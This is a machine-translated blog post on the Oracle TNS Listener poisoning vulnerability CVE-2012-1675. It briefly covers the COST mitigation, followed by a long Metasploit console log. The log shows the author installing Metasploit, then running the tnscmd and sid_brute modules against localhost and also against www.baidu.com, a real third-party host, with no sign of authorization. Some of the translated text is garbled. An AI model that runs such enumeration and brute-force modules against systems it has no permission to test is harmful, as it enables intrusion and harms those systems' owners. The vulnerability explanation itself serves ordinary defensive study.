Shulou(Shulou.com)06/01 Report--

Remote data poisoning vulnerability (CVE-2012-1675)

A vulnerability that allows a user to poison data processed by a remote "TNS Listener" component without providing a username / password.

COST is the abbreviation of class of secure transports. It is a security control mechanism provided to control instance registration. Its purpose is to restrict which instances can be registered through which protocols for a certain listener. This will avoid the risk of malicious registration by other remote instances and the resulting risk of information disclosure.

It does this by setting the value of the parameter SECURE_REGISTER_listener_name in listner.ora and specifying it as a transport list (a qualified list of registration protocols, such as IPC, TCP, TCPS). This feature is supported from version 10.2.0.3 (although it is not explicitly stated in the online documentation for 10g R2) and is still available until version 11.2.0.4 and later. However, after 11.2.0.4, oracle recommends that you use the default VNCR configuration.

Harm

The main harm is that * * users can create a database with the same name as the current production database and register it with the monitoring of the production database.

This will cause the user connection to be routed to the instance created by the user, resulting in an interruption of the business response.

The application reports ORA-12545: the affected version of Connect failed because target host or object does not exist

Although the security warning describes the beginning of 10203, it is actually any version starting from 8i

4. My verification

[root@204_maridb] # curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall & &\

Chmod 755 msfinstall & &\

. / msfinstall

Total Received Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

5532 5532 00 6758 0 -:-6754

Checking for and installing update..

Adding metasploit-framework to your repository list.. Loaded plug-in: fastestmirror

Repository base is listed more than once in the configuration

Repository updates is listed more than once in the configuration

Repository extras is listed more than once in the configuration

Repository centosplus is listed more than once in the configuration

Metasploit | 2.9 kB 00:00:00

Metasploit/primary_db | 9.8 kB 00:00:00

Loading mirror speeds from cached hostfile

Epel: mirrors.tuna.tsinghua.edu.cn

Resolving dependencies

-- > checking transaction

-> package metasploit-framework.x86_64.0.5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 will be installed

-- > resolve dependency completion

Dependency resolution

=

Package Schema version Source size

Installing:

Metasploit-framework x8634 5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 metasploit 195m

Transaction summary

Install 1 package

Total downloads: 195m

Installation size: 433 m

Downloading packages:

Warning: / var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: header V4 RSA/SHA256 Signature, key ID 2007b954: NOKEYMB 00:00:00 ETA

The public key of metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm has not been installed

Metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07

Retrieve the key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

Import GPG key 0x2007B954:

User ID: "Metasploit"

Fingerprint: 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954

From: / etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

Running transaction check

Running transaction test

Transaction test succeeded

Running transaction

Installing: metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1 Compact 1

Run msfconsole to get started

Validating: metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1 Compact 1

Installed:

Metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

Over!

[root@204_maridb ~] # ms

Msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msgcmp msgconv msgexec msgfmt msghack msgmerge msguniq

Msfconsole msfdb msfmachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2mysql

[root@204_maridb ~] # msfconsole

-bash: / usr/local/bin/msfconsole: there is no such file or directory

[root@204_maridb ~] # which msfconsole

/ usr/bin/msfconsole

[root@204_maridb ~] # / usr/bin/msfconsole

[-] * rting the Metasploit Framework console... |

[-] WARNING: No database support: No database YAML file

[-]

+-- +

| | METASPLOIT by Rapid7 |

+-+

| _ _ | |

| | = c (_ o (_ ()) | | "| = [* * | |

|) =\ | | EXPLOIT\ |

| / /\ | | _ |

| | / /\ | | = = [msf >] =\ |

| | / /\ | | _ _\ |

| / / RECON\ | (@) / |

| / /\ | * |

+-+

| | o O o |\'/'/ | |

| | o O |) = (|

| | o |.' LOOT'. | |

| ^ | l | / | |\ |

| | PAYLOAD | "_, | / (| |\ | |

| | | _ _ | |) | _ | |) | |

| | (@) (@) "" | (@) (@) | (@) | "|

| | = |'-'|

+-+

= [metasploit v5.0.19 payloads -]-= [1880 exploits-1062 auxiliary-328 post]-= [546 payloads-44 encoders-10 nops]-= [2 evasion]

Msf5 > use auxiliary/admin/oracle/tnscmd

Msf5 auxiliary (admin/oracle/tnscmd) > info

Name: Oracle TNS Listener Command Issuer Module: auxiliary/admin/oracle/tnscmdLicense: Metasploit Framework License (BSD) Rank: Normal

Disclosed: 2009-02-01

Provided by:

MC

Check supported:

No

Basic options:

Name Current Setting Required Description

CMD (CONNECT_DATA= (COMMAND=VERSION)) no Something like ping, version, status, etc..

RHOSTS yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

Description:

This module allows for the sending of arbitrary TNS commands in

Order to gather information. Inspired from tnscmd.pl from

Www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

Msf5 auxiliary (admin/oracle/tnscmd) > set RHOST www.xxxx.cc

RHOST = > www.xxxx.cc

Msf5 auxiliary (admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA= (COMMAND=VERSION)) no Something like ping, version, status, etc..

RHOSTS www.xxxx.cc yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

Msf5 auxiliary (admin/oracle/tnscmd) > run

[-] Auxiliary failed: option RHOSTS failed to validate.

Msf5 auxiliary (admin/oracle/tnscmd) > set RHOST www.baidu.com

RHOST = > www.baidu.com

Msf5 auxiliary (admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA= (COMMAND=VERSION)) no Something like ping, version, status, etc..

RHOSTS www.baidu.com yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

Msf5 auxiliary (admin/oracle/tnscmd) > run

[*] Running module against 61.135.169.125

Www.baidu.com:1521-The connection timed out (www.baidu.com:1521).

[] Running module against 61.135.169.121

Www.baidu.com:1521-The connection timed out (www.baidu.com:1521).

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute

Msf5 auxiliary (admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

SIDFILE / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt no The file that contains a list of sids.

SLEEP 1 no Sleep () amount between each request.

Msf5 auxiliary (admin/oracle/sid_brute) > set RHOST www.baidu.com

RHOST = > www.baidu.com

Msf5 auxiliary (admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS www.baidu.com yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

SIDFILE / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt no The file that contains a list of sids.

SLEEP 1 no Sleep () amount between each request.

Msf5 auxiliary (admin/oracle/sid_brute) > run

[*] Running module against 61.135.169.121

[] www.baidu.com:1521-Starting brute force on www.baidu.com, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

Www.baidu.com:1521-The connection timed out (www.baidu.com:1521).

[] Running module against 61.135.169.125

[] www.baidu.com:1521-Starting brute force on www.baidu.com, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

Www.baidu.com:1521-The connection timed out (www.baidu.com:1521).

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) > set RHOST 127.0.0.1

RHOST = > 127.0.0.1

Msf5 auxiliary (admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[] 127.0.0.1 Starting brute force on 1521-127.0.0.1, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'PLSExtProc'

[+] 127.0.0.1 Found SID 'TSH1'

[] 127.0.0.1 purl 1521-Done with brute force...

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) > run

[] Running module against 127.0.0.1

[] 127.0.0.1 Starting brute force on 1521-127.0.0.1, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'PLSExtProc'

[-] 127.0.0.1 1521-The connection was refused by the remote host.

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1 opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt... 1521-Starting brute force on 127.0.0.1, using sids from /

[+] 127.0.0.1 Found SID 'PLSExtProc'

[+] 127.0.0.1 Found SID 'TSH1'

[] 127.0.0.1 purl 1521-Done with brute force...

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) >

Msf5 auxiliary (admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[] 127.0.0.1 Starting brute force on 1521-127.0.0.1, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[] 127.0.0.1 purl 1521-Done with brute force...

[] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) > run

[] Running module against 127.0.0.1

[] 127.0.0.1 Starting brute force on 1521-127.0.0.1, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[] 127.0.0.1 purl 1521-Done with brute force...

[*] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) > exit

[root@204_maridb ~] # / usr/bin/msfconsole

[-] * rting the Metasploit Framework console... |

[-] WARNING: No database support: No database YAML file

[-]

; lxO0KXXXK0Oxl:. , o0WMMMMMMMMMMMMMMMMMMKd, 'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,: KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX

LWMMMMMMMMMMMXd:.. ..; dKMMMMMMMMMMMMo

XMMMMMMMMMMWd. .oNMMMMMMMMMMk

OMMMMMMMMMMx. DMMMMMMMMMMx

.WMMMMMMMMM:: MMMMMMMMMM

XMMMMMMMMMo lMMMMMMMMMO

NMMMMMMMMW, cccccoMMMMMMMMMWlccccc

MMMMMMMMMX; KMMMMMMMMMMMMMMMMMMX:

NMMMMMMMMW. ; KMMMMMMMMMMMMMMX:

XMMMMMMMMMd, 0MMMMMMMMMMK

.WMMMMMMc 'OMMMMMM0

LMMMMMMMMMMk. .kMMO'

DMMMMMMMMMMWd'..

CWMMMMMMMMMMMNxc'. #

.0MMMMMMMMMMMMMMMMWc # + # + #

; 0MMMMMMMMMMMMMMMo. +: +

.dNMMMMMMMMMMMMo + # + +: + + # +

'oOWMMMMMMMMo +: +

CdkO0K;: +:: +:

: +:

Metasploit

= [metasploit v5.0.19 payloads -]-= [1880 exploits-1062 auxiliary-328 post]-= [546 payloads-44 encoders-10 nops]-= [2 evasion]

Msf5 > use auxiliary/admin/oracle/tnscmd

Msf5 auxiliary (admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA= (COMMAND=VERSION)) no Something like ping, version, status, etc..

RHOSTS yes The target address range or CIDR identifier

RPORT 1521 yes The target port (TCP)

Msf5 auxiliary (admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute

Msf5 auxiliary (admin/oracle/sid_brute) > set RHOST 127.0.0.1

RHOST = > 127.0.0.1

Msf5 auxiliary (admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[] 127.0.0.1 Starting brute force on 1521-127.0.0.1, using sids from / opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[] 127.0.0.1 purl 1521-Done with brute force...

[*] Auxiliary module execution completed

Msf5 auxiliary (admin/oracle/sid_brute) >

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.